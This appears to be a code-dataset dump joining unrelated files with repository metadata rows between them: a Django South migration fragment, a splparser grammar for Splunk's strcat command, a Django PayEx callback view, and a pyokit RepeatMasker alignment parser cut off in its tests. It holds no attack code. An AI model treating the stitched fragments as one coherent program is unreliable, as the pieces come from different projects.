'color_code': ('django.db.models.fields.CharField', [], {'default': "'0xffffff'", 'max_length': '10'}),
'color_name': ('django.db.models.fields.CharField', [], {'default': "'None'", 'max_length': '100'}),
'context': ('django.db.models.fields.CharField', [], {'default': "'None'", 'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.CharField', [], {'max_length': '160'}),
'muse': ('django.db.models.fields.CharField', [], {'default': "'None'", 'max_length': '100'}),
'reasoning': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True'}),
'tweeted': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.FloatField', [], {'default': '0.0'})
},
u'tweets.tweetimage': {
'Meta': {'object_name': 'TweetImage'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'interjection': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'original': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'processed': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'text': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'blank': 'True'})
},
u'tweets.unbracketedcolorbigram': {
'Meta': {'ordering': "['-f']", 'unique_together': "(('w1', 'w2'),)", 'object_name': 'UnbracketedColorBigram'},
'f': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'w1': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'w2': ('django.db.models.fields.CharField', [], {'max_length': '40'})
},
u'tweets.urltweetimage': {
'Meta': {'object_name': 'URLTweetImage', '_ormbases': [u'tweets.TweetImage']},
u'tweetimage_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['tweets.TweetImage']", 'unique': 'True', 'primary_key': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
}
}
complete_apps = ['tweets']
|
mit
| 7,883,426,377,490,909,000 | 68.8125 | 163 | 0.540788 | false |
salspaugh/splparser
|
splparser/rules/strcatrules.py
|
1
|
1210
|
#!/usr/bin/env python
from splparser.parsetree import *
from splparser.exceptions import SPLSyntaxError
from splparser.rules.common.fieldrules import *
from splparser.rules.common.fieldlistrules import *
from splparser.rules.common.valuerules import *
from splparser.lexers.strcatlexer import precedence, tokens
start = 'cmdexpr'
def p_strcat(p):
"""cmdexpr : STRCAT fieldlist"""
for field_node in p[2].children:
if field_node.nodetype == 'LITERAL':
field_node.role = 'VALUE'
p[0] = ParseTreeNode('COMMAND', raw='strcat')
p[0].add_children(p[2].children)
def p_strcat_opt(p):
"""cmdexpr : STRCAT STRCAT_OPT EQ value fieldlist"""
p[4].value = 'BOOLEAN'
    for field_node in p[5].children:  # the fieldlist is p[5] here; p[2] is the option name token
if field_node.nodetype == 'LITERAL':
field_node.role = 'VALUE'
p[0] = ParseTreeNode('COMMAND', raw='strcat')
eq_node = ParseTreeNode('EQ', raw='assign')
opt_node = ParseTreeNode('OPTION', raw=p[2])
opt_node.values.append(p[4])
p[0].add_child(eq_node)
eq_node.add_child(opt_node)
eq_node.add_child(p[4])
p[0].add_children(p[5].children)
def p_error(p):
raise SPLSyntaxError("Syntax error in strcat parser input!")
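# Hedged illustration: inputs these grammar rules are meant to accept.  The
# option name is an assumption based on the STRCAT_OPT token class.
#   strcat field1 field2 dest               -> handled by p_strcat
#   strcat allrequired=t field1 field2 dest -> handled by p_strcat_opt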
|
bsd-3-clause
| 7,799,196,665,154,092,000 | 30.842105 | 65 | 0.670248 | false |
funkbit/django-payex
|
djpayex/views.py
|
1
|
1610
|
import logging
from django.conf import settings
from django.http import HttpResponse, HttpResponseNotAllowed
from payex.service import PayEx
from djpayex.models import TransactionStatus
logger = logging.getLogger(__name__)
# Initialize PayEx service
service = PayEx(
merchant_number=settings.PAYEX_MERCHANT_NUMBER,
encryption_key=settings.PAYEX_ENCRYPTION_KEY,
production=settings.PAYEX_IN_PRODUCTION
)
def callback(request):
"""
NOTE Not fully implemented yet.
PayEx will send a transaction callback (as HTTP Post) to the merchant,
if any transaction status is updated at the PayEx system.
    Request from PayEx:
    HTTP 200 transactionRef=<32 digits>&transactionNumber=<8 digits>(&orderRef=<32 digits> if it exists)
    Response from merchant:
    HTTP 200 OK or FAILURE. On "FAILURE" PayEx will retry the HTTP POST request 5 times, at approximately 15 minute intervals
Documentation:
http://www.payexpim.com/quick-guide/9-transaction-callback/
"""
logger.info('Got PayEx callback: %(raw_post_data)s\n%(meta)s\n%(post_data)s' % {
'raw_post_data': request.raw_post_data,
'meta': request.META,
'post_data': request.POST,
})
if request.method != 'POST':
return HttpResponseNotAllowed(['POST',])
orderref = request.POST.get('orderRef', None)
if orderref:
response = service.complete(orderRef=orderref)
status = TransactionStatus.objects.create_from_response(response)
return HttpResponse('OK')
return HttpResponse('FAILURE')
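# Hedged sketch of exercising the callback from a Django test client; the URL
# and the 32/8-digit field values below are placeholders that match the
# documented format, not real PayEx data.
#
#   response = client.post('/payex/callback/', {
#       'transactionRef': '0' * 32,
#       'transactionNumber': '12345678',
#       'orderRef': 'a' * 32,
#   })
#   assert response.content in ('OK', 'FAILURE')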
|
bsd-2-clause
| -4,014,406,681,933,296,000 | 30.568627 | 131 | 0.68882 | false |
pjuren/pyokit
|
src/pyokit/io/repeatmaskerAlignments.py
|
1
|
38860
|
"""
Date of Creation: 11th Dec 2014
Description: Classes and functions for IO of repeatmasker pairwise
alignments.
Copyright (C) 2010-2015
Philip J. Uren,
Authors: Philip J. Uren
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
# standard python imports
import sys
import StringIO
import unittest
import re
# Pyokit imports
from pyokit.datastruct.sequence import Sequence
from pyokit.datastruct.sequence import UNKNOWN_SEQ_NAME
from pyokit.util.progressIndicator import ProgressIndicator
from pyokit.datastruct.multipleAlignment import PairwiseAlignment
from pyokit.datastruct.multipleAlignment import JustInTimePairwiseAlignment
###############################################################################
# CONSTANTS #
###############################################################################
REPEATMASKER_FIELDS_TO_TRIM = [0, 1, 4, 7, 8, 9, 11]
REPEATMASKER_VALIDATE_MUTATIONS = True
REPEATMASKER_VALID_ANN_CHARS = ['-', 'i', 'v', ' ', '?']
# default values for repeatmasker formatting variables
DEFAULT_MAX_NAME_WIDTH = None
DEFAULT_COL_WIDTH = 50
###############################################################################
# META-DATA ALIGNMENT CONSTANTS #
# these are the keys to index into a pairwise alignment object's meta-data #
# dictionary and extract whatever is needed for formatting a repeat-masker #
# representation of it #
###############################################################################
# stores the value of the second-last token from the header of the alignment;
# its meaning is unknown to me.
UNKNOWN_RM_HEADER_FIELD_KEY = "unknown_rm_header_field"
# stores the unique ID assigned to an alignment by repeat-masker
RM_ID_KEY = "rm_id"
#: score for the alignment; no requirement on how this is computed.
ALIG_SCORE_KEY = "alig_score"
#: annotation for each column of the alignment; no requirements on format.
ANNOTATION_KEY = "annotation"
#: percentage of substitutions (i.e. gap-free columns that are not matches)
PCENT_SUBS_KEY = "pcnt_subs"
#: the percentage of the first sequence which is gaps. This is not computed
#: from the sequence itself, so may not be accurate.
PCENT_S1_INDELS_KEY = "pcnt_s1_indels"
#: the percentage of the second sequence which is gaps. This is not computed
#: from the sequence itself, so may not be accurate.
PCENT_S2_INDELS_KEY = "pcnt_s2_indels"
#: meta-data lines that are not key = value pairs, stored verbatim for round-trip output.
ROUNDTRIP_KEY = "roundtrip"
###############################################################################
# FULL KEY LIST #
###############################################################################
#: The full set of meta-data keys that have special meaning
KNOWN_KEYS = set([ANNOTATION_KEY, PCENT_SUBS_KEY, PCENT_S1_INDELS_KEY,
PCENT_S2_INDELS_KEY, ALIG_SCORE_KEY, RM_ID_KEY,
UNKNOWN_RM_HEADER_FIELD_KEY])
###############################################################################
# CONVERTING ALIGNMENTS TO REPEATMASKER STRING FORMATS #
###############################################################################
def _get_repeat_masker_header(pairwise_alignment):
"""generate header string of repeatmasker formated repr of self."""
res = ""
res += str(pairwise_alignment.meta[ALIG_SCORE_KEY]) + " "
res += "{:.2f}".format(pairwise_alignment.meta[PCENT_SUBS_KEY]) + " "
res += "{:.2f}".format(pairwise_alignment.meta[PCENT_S1_INDELS_KEY]) + " "
res += "{:.2f}".format(pairwise_alignment.meta[PCENT_S2_INDELS_KEY]) + " "
res += (pairwise_alignment.s1.name
if (pairwise_alignment.s1.name != "" and
pairwise_alignment.s1.name is not None)
else UNKNOWN_SEQ_NAME) + " "
res += str(pairwise_alignment.s1.start) + " "
res += str(pairwise_alignment.s1.end - 1) + " "
res += "(" + str(pairwise_alignment.s1.remaining) + ") "
res += ("C " if not pairwise_alignment.s2.is_positive_strand() else "")
res += (pairwise_alignment.s2.name
if (pairwise_alignment.s2.name != "" and
pairwise_alignment.s2.name is not None)
else UNKNOWN_SEQ_NAME) + " "
res += ("(" + str(pairwise_alignment.s2.remaining) + ")"
if not pairwise_alignment.s2.is_positive_strand()
else str(pairwise_alignment.s2.start))
res += " "
# Note here that we need to convert between our internal representation
# for coordinates and the repeat-masker one; internally, we always store
# coordinates as exclusive of the final value with start < end;
# repeatmasker gives the larger coordinate as the 'start' when the match
# is to the reverse complement, so we have to swap start/end, and its
# coordinates are inclusive of end, so we have to subtract 1 from end.
res += str(pairwise_alignment.s2.end - 1) + " "
res += (str(pairwise_alignment.s2.start)
if not pairwise_alignment.s2.is_positive_strand()
else "(" + str(pairwise_alignment.s2.remaining) + ")") + " "
res += pairwise_alignment.meta[UNKNOWN_RM_HEADER_FIELD_KEY] + " "
res += str(pairwise_alignment.meta[RM_ID_KEY])
return res
def _to_repeatmasker_string(pairwise_alignment, column_width=DEFAULT_COL_WIDTH,
m_name_width=DEFAULT_MAX_NAME_WIDTH):
"""
  generate a repeatmasker-formatted representation of the given pairwise alignment.
:param column_width: number of characters to output per line of alignment
:param m_name_width: truncate names on alignment lines to this length
(set to None for no truncation)
"""
s1 = pairwise_alignment.s1
s2 = pairwise_alignment.s2
s1_neg = not s1.is_positive_strand()
s2_neg = not s2.is_positive_strand()
size = pairwise_alignment.size()
# figure out the complement column
s1_comp = "C" if s1_neg else " "
s2_comp = "C" if s2_neg else " "
# figure out the maximum name length, so we can size that column properly;
# pre-compute the space-padded names too
s1_len = len(s1.name)
s2_len = len(s2.name)
f_len = max(s1_len, s2_len)
if m_name_width is not None:
f_len = min(f_len, m_name_width)
s1_n = s1.name[:f_len] + (' ' * (f_len - s1_len))
s2_n = s2.name[:f_len] + (' ' * (f_len - s2_len))
# figure out the max width for the coordinates column; we use size of the
# alignment here rather than ungapped coordinates because its an upper
# bound and easier to compute (i.e. for sure already know).
s1_line_end_num = (s1.end if s1_neg else s1.start - 1)
s2_line_end_num = (s2.end if s2_neg else s2.start - 1)
max_num_len = max(len(str(s1.start + size)), len(str(s2.start + size)))
res = "" # our result
i = 0 # how much of the full, gapped alignment, has been output so far?
res += _get_repeat_masker_header(pairwise_alignment) + "\n\n"
while i < len(pairwise_alignment.s1):
# keep track of how much of each sequence we've output
s1_sub = s1.gapped_relative_subsequence(i + 1, min(i + column_width + 1, len(s1) + 1))
s2_sub = s2.gapped_relative_subsequence(i + 1, min(i + column_width + 1, len(s2) + 1))
s1_ug_len = s1_sub.ungapped_len
s2_ug_len = s2_sub.ungapped_len
s1_line_start_num = (s1_line_end_num - 1 if s1_neg
else s1_line_end_num + 1)
s1_line_end_num = (s1_line_start_num - s1_ug_len + 1 if s1_neg
else s1_line_start_num + s1_ug_len - 1)
s2_line_start_num = (s2_line_end_num - 1 if s2_neg
else s2_line_end_num + 1)
s2_line_end_num = (s2_line_start_num - s2_ug_len + 1 if s2_neg
else s2_line_start_num + s2_ug_len - 1)
# output sequence one
res += (s1_comp + " " + s1_n + " ")
s1_line_start_num_str = str(s1_line_start_num)
s1_num_padding = max_num_len - len(s1_line_start_num_str)
res += (' ' * s1_num_padding) + s1_line_start_num_str + " "
res += pairwise_alignment.s1[i:i + column_width] + " "
res += str(s1_line_end_num) + "\n"
    # output the annotation string, if we have one; needs to be padded by the
    # number of chars in the name col (f_len), the number in the coordinate
    # col (max_num_len), the one char in the complement column, and the
    # three spaces that are used as column separators for those.
if ANNOTATION_KEY in pairwise_alignment.meta:
res += (((f_len + max_num_len) * ' ') + " " +
pairwise_alignment.meta[ANNOTATION_KEY][i:i + column_width] + "\n")
# output sequence two
res += (s2_comp + " " + s2_n + " ")
s2_line_start_num_str = str(s2_line_start_num)
s2_num_padding = max_num_len - len(s2_line_start_num_str)
res += (' ' * s2_num_padding) + s2_line_start_num_str + " "
res += pairwise_alignment.s2[i:i + column_width] + " "
res += str(s2_line_end_num) + "\n"
res += "\n"
i += column_width
  # output any meta-data key-value pairs that aren't known to us.
if pairwise_alignment.meta is not None:
for k in pairwise_alignment.meta:
if k not in KNOWN_KEYS:
        if k == ROUNDTRIP_KEY:
res += (pairwise_alignment.meta[k] + "\n")
else:
res += (k + " = " + str(pairwise_alignment.meta[k]) + "\n")
# remove any trailing whitespace
res = res.strip()
return res
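# Hedged usage sketch for the formatter above: given a PairwiseAlignment ``pa``
# whose meta dictionary contains the keys defined at the top of this module, a
# repeat-masker style dump could be produced with, e.g.
#   print _to_repeatmasker_string(pa, column_width=50)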
###############################################################################
# EXCEPTION CLASSES #
###############################################################################
class AlignmentIteratorError(Exception):
def __init__(self, msg):
self.value = msg
def __str__(self):
return repr(self.value)
###############################################################################
# REPEATMASKER PAIRWISE ALIGNMENT ITERATOR AND HELPER FUNCS #
###############################################################################
def _rm_is_alignment_line(parts, s1_name, s2_name):
"""
return true if the tokenized line is a repeatmasker alignment line.
:param parts: the line, already split into tokens around whitespace
:param s1_name: the name of the first sequence, as extracted from the header
of the element this line is in
:param s2_name: the name of the second sequence, as extracted from the header
of the element this line is in
"""
if len(parts) < 2:
return False
if _rm_name_match(parts[0], s1_name):
return True
if (_rm_name_match(parts[0], s2_name) or
(parts[0] == "C" and _rm_name_match(parts[1], s2_name))):
return True
return False
def _rm_is_header_line(parts, n):
"""
determine whether a pre-split string is a repeat-masker alignment header.
headers have no special structure or symbol to mark them, so this is based
only on the number of elements, and what data type they are.
"""
if (n == 15 and parts[8] == "C"):
return True
  if (n == 14 and parts[0].isdigit()):
    return True
  return False
def _rm_is_valid_annotation_line(line):
"""
:return: True if the line contains only valid annotation characters (defined
in REPEATMASKER_VALID_ANN_CHARS), otherwise False
"""
for c in line:
if c not in REPEATMASKER_VALID_ANN_CHARS:
return False
return True
def _rm_compute_leading_space_alig(space_pres_split, seq):
"""
count the number of characters that precede the sequence in a repeatmasker
alignment line. E.g. in the following line:
' chr1 11 CCCTGGAGATTCTTATT--AGTGATTTGGGCT 41'
the answer would be 24.
:param space_pres_split: the alignment line, split into tokens around spaces,
but with the spaces conserved as tokens.
:param seq: the sequence token.
"""
c = 0
for i in range(0, len(space_pres_split)):
if space_pres_split[i] == seq:
break
c += len(space_pres_split[i])
return c
def _rm_compute_leading_space(space_s_pres_split):
"""
count the number of spaces that precede a non-space token (not including
empty string tokens) in a string.
:param space_s_pres_split: the string, split into tokens around spaces,
but with the spaces conserved as tokens.
"""
i = 0
c = 0
while (i < len(space_s_pres_split) and
(space_s_pres_split[i].isspace() or
(space_s_pres_split[i] == ""))):
c += len(space_s_pres_split[i])
i += 1
return c
def _rm_get_names_from_header(parts):
"""
get repeat and seq. name from repeatmasker alignment header line.
An example header line is::
239 29.42 1.92 0.97 chr1 11 17 (41) C XX#YY (74) 104 1 m_b1s502i1 4
the genomic sequence name is always at position 4 (zero-based index); the
name of the repeat is at position 9 if matching the reverse complement of
the consensus sequence for the repeat and position 8 otherwise
:param parts: the header line, as a tokenized list.
:return: tuple of (name of genomic sequence, name of repeat sequence)
"""
assert((parts[8] == "C" and len(parts) == 15) or (len(parts) == 14))
return (parts[4], parts[8]) if len(parts) == 14 else (parts[4], parts[9])
def _rm_get_reference_coords_from_header(parts):
"""
extract the reference (genomic sequence match) coordinates of a repeat
  occurrence from a repeatmasker header line. An example header line is::
239 29.42 1.92 0.97 chr1 11 17 (41) C XX#YY (74) 104 1 m_b1s502i1 4
  the genomic start and end are always at positions 5 and 6 respectively. In
the repeatmasker format, the end is inclusive, but in pyokit end coordinates
are exclusive, so we adjust it when we parse here.
:param parts: the header line, as a tokenized list.
:return: tuple of (start, end)
"""
s = int(parts[5])
e = int(parts[6]) + 1
if (s >= e):
raise AlignmentIteratorError("invalid repeatmakser header: " +
" ".join(parts))
return (s, e)
def _rm_get_repeat_coords_from_header(parts):
"""
extract the repeat coordinates of a repeat masker match from a header line.
An example header line is::
239 29.42 1.92 0.97 chr1 11 17 (41) C XX#YY (74) 104 1 m_b1s502i1 4
239 29.42 1.92 0.97 chr1 11 17 (41) XX#YY 1 104 (74) m_b1s502i1 4
if the match is to the reverse complement, the start and end coordinates are
at positions 11 and 12 (zero-based indexes), otherwise they're at positions
9 and 10. In the later case, the 'start' is the earlier number and the end
is the larger one. In reverse complement matches, RM lists the 'start' as the
larger number and the end as the smaller one. We swap these around to match
the Pyokit convention of start < end always and also adjust the end so it is
not inclusive of the last position
:param parts: the header line, as a tokenized list.
:return: tuple of (start, end)
"""
assert((parts[8] == "C" and len(parts) == 15) or (len(parts) == 14))
if len(parts) == 14:
s = int(parts[9])
e = int(parts[10]) + 1
else:
s = int(parts[12])
e = int(parts[11]) + 1
if (s >= e):
raise AlignmentIteratorError("invalid repeatmakser header: " +
" ".join(parts))
return (s, e)
def _rm_is_reverse_comp_match(parts):
"""
determine whether a repeat occurrence is a match to the reverse complement
  of the consensus. Headers look like this::
239 29.42 1.92 0.97 chr1 11 17 (41) C XX#YY (74) 104 1 m_b1s502i1 4
If the match is to the reverse complement, then there is a "C" at position
8 (zero-based index) and a total of 15 fields; otherwise the "C" is missing
and there are only 14 fields.
:param parts: the header line, as a tokenized list.
"""
assert((parts[8] == "C" and len(parts) == 15) or (len(parts) == 14))
return len(parts) == 15
def _rm_get_remaining_genomic_from_header(parts):
"""
get the remaining number of bases that are on the genomic sequence after
the match from the header line of a repeatmasker alignment. An example header
line is::
239 29.42 1.92 0.97 chr1 11 17 (41) C XX#YY (74) 104 1 m_b1s502i1 4
The remaining genomic bases are always at position 7 (zero-based index)
"""
return int(parts[7][1:-1])
def _rm_get_remaining_repeat_from_header(parts):
"""
get the remaining number of bases that are on the repeat consensus after
the match from the header line of a repeatmasker alignment. An example header
line is::
239 29.42 1.92 0.97 chr1 11 17 (41) XX#YY 1 104 (74) m_b1s502i1 4
239 29.42 1.92 0.97 chr1 11 17 (41) C XX#YY (74) 104 1 m_b1s502i1 4
If the match is to the consensus, this number is at position 11 (zero-based
index), while a match to the reverse complement places it at position 10.
  The parentheses indicate it is a negative strand coordinate.
"""
if _rm_is_reverse_comp_match(parts):
return int(parts[10][1:-1])
else:
return int(parts[11][1:-1])
def _rm_parse_header_line(parts, meta_data):
"""
parse a repeatmasker alignment header line and place the extracted meta-data
into the provided dictionary. An example header line is::
239 29.42 1.92 0.97 chr1 11 17 (41) C XX#YY (74) 104 1 m_b1s502i1 4
If the alignment is to the consensus, this will have 14 fields; to the
reverse complement of the repeat consensus and it'll have 15. Fields as
follows:
===== ======== ==========================================================
Num Value description
===== ======== ==========================================================
0 239 Smith-Waterman score of the match
1 29.42 percent substitutions in match compared to the consensus
2 1.92 percent bases opposite gap in query seq (deleted bp)
3 0.97 percent bases opposite gap in repeat consensus (insert bp)
4 chr1 The name of the reference sequence (usually genomic chrom)
5 11 Start location in reference; always pos strand, I think..
6 17 End location in reference; always pos strand, I think..
7 (41) Distance to end of ref (alt., neg strand co-ord of end)
8 C Alignment is to rev. comp. of consensus. Ommited otherwise
8/9 XX#YY XX is the name of the repeat and YY is the family
9/10 (74) if +'ve, strt coord; else bases before start on neg strand
10/11 104 if +'ve, end coord; else start of match in pos strand
11/12 1 if +'ve, num bases aftr mtch to end; else end in + coords
12/13 m_b1s5.. ....?
13/14 4 unique ID
===== ======== ==========================================================
Note that repeat-masker calls the larger coordinate the start when the match
is to the reverse complement; we swap these internally so start < end always,
regardless of whether the match is to the consensus or the reverse complement
of the consensus
Each field is mapped to a key as follows
===== =================================================================
Num Key (these are defined in pyokit.datastruct.multipleAlignment.py)
===== =================================================================
0 ALIG_SCORE_KEY
1 PCENT_SUBS_KEY
2 PCENT_S1_INDELS_KEY
3 PCENT_S2_INDELS_KEY
4 S1_NAME_KEY
5 S1_START_KEY
6 S1_END_KEY
7 S1_END_NEG_STRAND_KEY
8 S2_REVERSE_COMP_KEY
8/9 S2_NAME_KEY
9/10 S2_START_KEY (S2 + strand) / S2_START_NEG_STRAND_KEY (S2 - strand)
10/11 S2_END_KEY (S2 + strand) / S2_START_KEY (S2 - strand)
11/12 S2_END_NEG_STRAND_KEY (S2 + strand) / S2_END_KEY (S2 - strand)
12/13 UNKNOWN_RM_HEADER_FIELD_KEY
13/14 RM_ID_KEY
===== =================================================================
:param parts: the header line, as a tokenized list.
:param meta_data: dictionary; resultant key-value pairs placed into this.
"""
meta_data[ALIG_SCORE_KEY] = parts[0]
meta_data[PCENT_SUBS_KEY] = float(parts[1])
meta_data[PCENT_S1_INDELS_KEY] = float(parts[2])
meta_data[PCENT_S2_INDELS_KEY] = float(parts[3])
meta_data[ANNOTATION_KEY] = ""
if parts[8] == "C":
meta_data[UNKNOWN_RM_HEADER_FIELD_KEY] = parts[13]
meta_data[RM_ID_KEY] = int(parts[14])
else:
meta_data[UNKNOWN_RM_HEADER_FIELD_KEY] = parts[12]
meta_data[RM_ID_KEY] = int(parts[13])
def _rm_name_match(s1, s2):
"""
determine whether two sequence names from a repeatmasker alignment match.
  :return: True if they are the same string, or if one is a prefix of the
           other, else False
"""
m_len = min(len(s1), len(s2))
return s1[:m_len] == s2[:m_len]
def _rm_parse_meta_line(parts):
p_locs = []
for i in range(0, len(parts)):
if parts[i].strip() == "=":
p_locs.append(i)
if len(p_locs) != 1:
return ROUNDTRIP_KEY, " ".join(parts)
else:
k = " ".join(parts[:p_locs[0]])
v = " ".join(parts[p_locs[0] + 1:])
return k.strip(), v.strip()
def _rm_extract_sequence_and_name(alig_str_parts, s1_name, s2_name):
"""
parse an alignment line from a repeatmasker alignment and return the name
  of the sequence it is from and the sequence portion contained in the line.
:param alig_str_parts: the alignment string, split around whitespace as list
:param s1_name: the name of the first sequence in the alignment this line is
from
:param s2_name: the name of the second sequence in the alignment this line is
from
:return: a tuple of name and sequence string; name will always be either
s1_name or s2_name
:raise AlignmentIteratorError: if the line doesn't have the expected number
of elements, or the name does not match
either of s1_name or s2_name
"""
  # first, based on the number of parts we have, we'll guess whether it's a
# reverse complement or not
if len(alig_str_parts) == 4:
    # expect the first element to match something...
nm = alig_str_parts[0]
seq = alig_str_parts[2]
elif len(alig_str_parts) == 5:
# expect the second element to match something...
nm = alig_str_parts[1]
seq = alig_str_parts[3]
else:
raise AlignmentIteratorError("failed parsing alignment line '" +
" ".join(alig_str_parts) + "'; reason: " +
"expected this line to have 4 or 5 " +
"elements, but it has " +
str(len(alig_str_parts)))
if _rm_name_match(nm, s1_name):
return s1_name, seq
elif _rm_name_match(nm, s2_name):
return s2_name, seq
else:
raise AlignmentIteratorError("failed parsing alignment line '" +
" ".join(alig_str_parts) + "'; reason: " +
"extracted alignment name (" + nm + ") " +
"did not match either sequence name from " +
"header line (" + s1_name + " or " +
s2_name + ")")
def repeat_masker_alignment_iterator(fn, index_friendly=True, verbose=False):
"""
  Iterator for repeat masker alignment files; yields pairwise alignment objects.
Iterate over a file/stream of full repeat alignments in the repeatmasker
format. Briefly, this format is as follows: each record (alignment) begins
with a header line (see _rm_parse_header_line documentation for details of
header format), followed by the alignment itself (example below) and finally
a set of key-value meta-data pairs.
The actual alignment looks like this::
chr1 11 CCCTGGAGATTCTTATT--AGTGATTTGGGCT 41
ii v -- v i i v
C MER5B#DNA/hAT 10 CCCCAGAGATTCTGATTTAATTGGTCTGGGGT 42
chr1 42 GACTG 47
v
C MER5B#DNA/hAT 43 CACTG 48
  The 'C' indicates that it's the reverse complement of the consensus. The
central string gives information about matches; "-" indicates an
insertion/deletion, "i" a transition (G<->A, C<->T) and "v" a transversion
(all other substitutions).
  :param fn: filename or stream-like object to read from.
:param index_friendly: if True, we will ensure the file/stream
position is before the start of the record when we
yield it; this requires the ability to seek within
the stream though, so if iterating over a
                         stream without that ability, you'll have to set this
to false. Further, this will disable buffering for
the file, to ensure file.tell() behaves correctly,
so a performance hit will be incurred.
:param verbose: if true, output progress messages to stderr.
"""
# step 1 -- build our iterator for the stream..
try:
fh = open(fn)
except (TypeError):
fh = fn
iterable = fh
if index_friendly:
iterable = iter(fh.readline, '')
# build progress indicator, if we want one and we're able to
if verbose:
try:
m_fn = ": " + fh.name
except TypeError:
m_fn = ""
try:
current = fh.tell()
fh.seek(0, 2)
total_progress = fh.tell()
fh.seek(current)
pind = ProgressIndicator(totalToDo=total_progress,
messagePrefix="completed",
messageSuffix="of processing repeat-masker "
"alignment file" + m_fn)
except IOError:
pind = None
old_fh_pos = None
new_fh_pos = fh.tell()
s1 = None
s2 = None
s1_name = None
s2_name = None
s1_start = None
s1_end = None
s2_start = None
s2_end = None
meta_data = None
alignment_line_counter = 0
alig_l_space = 0
prev_seq_len = 0
rev_comp_match = None
remaining_repeat = None
remaining_genomic = None
for line in iterable:
if verbose and pind is not None:
pind.done = fh.tell()
pind.showProgress()
if index_friendly:
old_fh_pos = new_fh_pos
new_fh_pos = fh.tell()
line = line.rstrip()
if line.lstrip() == "" and alignment_line_counter % 3 != 1:
continue
s_pres_split = re.split(r'(\s+)', line)
parts = [x for x in s_pres_split if not (x.isspace() or x == "")]
n = len(parts)
for i in REPEATMASKER_FIELDS_TO_TRIM:
if n >= i + 1:
parts[i] = parts[i].strip()
# decide what to do with this line -- is it a header line, part of the
# alignment or a meta-data key-value line
if alignment_line_counter % 3 == 1:
if (REPEATMASKER_VALIDATE_MUTATIONS and
not _rm_is_valid_annotation_line(line)):
raise IOError("invalid mutation line: " + line)
l_space = _rm_compute_leading_space(s_pres_split) - alig_l_space
pad_right = prev_seq_len - (l_space + len(line.strip()))
meta_data[ANNOTATION_KEY] += ((' ' * l_space) + line.strip() +
(' ' * pad_right))
alignment_line_counter += 1
elif _rm_is_header_line(parts, n):
if not (s1 is None and s2 is None and meta_data is None):
if ANNOTATION_KEY in meta_data:
meta_data[ANNOTATION_KEY] = meta_data[ANNOTATION_KEY].rstrip()
if index_friendly:
fh.seek(old_fh_pos)
ss1 = Sequence(s1_name, s1, s1_start, s1_end, "+", remaining_genomic)
s2s = "-" if rev_comp_match else "+"
ss2 = Sequence(s2_name, s2, s2_start, s2_end, s2s, remaining_repeat)
yield PairwiseAlignment(ss1, ss2, meta_data)
if index_friendly:
fh.seek(new_fh_pos)
meta_data = {}
s1 = ""
s2 = ""
s1_name, s2_name = _rm_get_names_from_header(parts)
s1_start, s1_end = _rm_get_reference_coords_from_header(parts)
s2_start, s2_end = _rm_get_repeat_coords_from_header(parts)
rev_comp_match = _rm_is_reverse_comp_match(parts)
remaining_repeat = _rm_get_remaining_repeat_from_header(parts)
remaining_genomic = _rm_get_remaining_genomic_from_header(parts)
_rm_parse_header_line(parts, meta_data)
alignment_line_counter = 0
elif _rm_is_alignment_line(parts, s1_name, s2_name):
alignment_line_counter += 1
name, seq = _rm_extract_sequence_and_name(parts, s1_name, s2_name)
if name == s1_name:
s1 += seq
elif name == s2_name:
s2 += seq
alig_l_space = _rm_compute_leading_space_alig(s_pres_split, seq)
prev_seq_len = len(seq)
else:
k, v = _rm_parse_meta_line(parts)
meta_data[k] = v
if index_friendly:
fh.seek(old_fh_pos)
ss1 = Sequence(s1_name, s1, s1_start, s1_end, "+", remaining_genomic)
s2s = "-" if rev_comp_match else "+"
ss2 = Sequence(s2_name, s2, s2_start, s2_end, s2s, remaining_repeat)
yield PairwiseAlignment(ss1, ss2, meta_data)
if index_friendly:
fh.seek(new_fh_pos)
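# A minimal usage sketch for the iterator above (the file name here is
# hypothetical; this block is illustration only and is not executed):
#
#   with open("alignments.fa.align") as in_fh:
#     for alignment in repeat_masker_alignment_iterator(in_fh,
#                                                       index_friendly=False):
#       print alignment.meta[ANNOTATION_KEY]
#
# The ``meta`` attribute on the yielded PairwiseAlignment objects matches its
# usage in the unit tests below; consult that class for the full interface.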
###############################################################################
# UNIT TESTS FOR THIS MODULE #
###############################################################################
class TestAlignmentIterators(unittest.TestCase):
def setUp(self):
# set up a repeat-masker file...
alig_1_header = "283 26.37 4.21 0.00 chr1 15 67 (266) C A#B (119) " +\
"141 85 m_b1s601i0 5 "
alig_1 = " chr1 15 CCACTGTACA-ATGGGGAAACT--GGCCC 40 \n" +\
" i v - i -- v \n" +\
"C A#B 141 CCATTTTACAGATGAGGAAACTGAGGCAC 113 \n" +\
" \n" +\
" chr1 41 AGAGCAAGGCAAAAGCAGCGCTGGG-TA 67 \n" +\
" v v vv ivi v i - v \n" +\
"C A#B 112 CAGCTAGTAAGTGGCAGAGCCGGGATTC 85 "
alig_1_m = "Matrix = 25p47g.matrix \n" +\
"Kimura (with divCpGMod) = 29.95 \n" +\
"Transitions / transversions = 1.40 (14/10) \n" +\
"Gap_init rate = 0.03 (3 / 90), avg. gap size = 1.33 (4 / 3)"
